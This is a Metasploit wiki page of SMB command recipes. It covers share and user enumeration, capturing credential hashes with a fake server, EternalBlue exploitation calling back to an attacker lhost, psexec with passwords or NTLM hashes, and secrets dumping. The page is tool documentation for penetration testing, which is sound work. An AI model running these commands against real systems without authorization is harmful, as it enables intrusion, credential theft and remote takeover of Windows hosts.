-
Notifications
You must be signed in to change notification settings - Fork 14.1k
Metasploit Guide SMB
adfoster-r7 edited this page Apr 21, 2022
·
6 revisions
Enumerate SMB version:
use auxiliary/scanner/smb/smb_version
run smb://10.10.10.161
Enumerate shares:
use auxiliary/scanner/smb/smb_enumshares
run smb://10.10.10.161
run smb://user:[email protected]
run 'smb://domain;user with spaces:[email protected]' SMB::AlwaysEncrypt=false SMB::ProtocolVersion=1
Enumerate shares and show all files recursively:
use auxiliary/scanner/smb/smb_enumshares
run 'smb://user:pass with a [email protected]' showfiles=true spidershares=true
Enumerate users:
use auxiliary/scanner/smb/smb_enumusers
run smb://user:[email protected]
Enumerate gpp files in a SMB share:
use auxiliary/scanner/smb/smb_enum_gpp
run smb://192.168.123.13/share_name verbose=true store=true
run smb://user:[email protected]/share_name verbose=true store=true
Create a mock SMB server which accepts credentials before returning NT_STATUS_LOGON_FAILURE. These hashes can then be cracked later:
use auxiliary/server/capture/smb
run
Checking for exploitability:
use auxiliary/scanner/smb/smb_ms17_010
check 10.10.10.23
check 10.10.10.0/24
check smb://user:[email protected]/
check smb://domain;user:[email protected]/
check cidr:/24:smb://user:[email protected] threads=32
As of 2021, Metasploit supports a single exploit module for which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10, full details within the Metasploit Wrapup:
use exploit/windows/smb/ms17_010_eternalblue
run 10.10.10.23 lhost=192.168.123.1
run 10.10.10.0/24 lhost=192.168.123.1 lport=5000
run smb://user:[email protected]/ lhost=192.168.123.1
run smb://domain;user:[email protected]/ lhost=192.168.123.1
Running psexec against a remote host with credentials:
use exploit/windows/smb/psexec
run smb://user:[email protected] lhost=192.168.123.1 lport=5000
Running psexec with NTLM hashes:
use exploit/windows/smb/psexec
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected] lhost=10.10.14.13 lport=5000
Dumping secrets with credentials:
use auxiliary/gather/windows_secrets_dump
run smb://user:[email protected]
Dumping secrets with NTLM hashes
use auxiliary/gather/windows_secrets_dump
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected]
Download a file:
use auxiliary/admin/smb/download_file
run smb://a:[email protected]/my_share/helloworld.txt
Upload a file:
use auxiliary/admin/smb/upload_file
echo "my file" > local_file.txt
run smb://a:[email protected]/my_share/remote_file.txt lpath=./local_file.txt
- Home Welcome to Metasploit!
- Using Metasploit A collection of useful links for penetration testers.
-
Setting Up a Metasploit Development Environment From
apt-get installtogit push. - CONTRIBUTING.md What should your contributions look like?
- Landing Pull Requests Working with other people's contributions.
- Using Git All about Git and GitHub.
- Contributing to Metasploit Be a part of our open source community.
- Meterpreter All about the Meterpreter payload.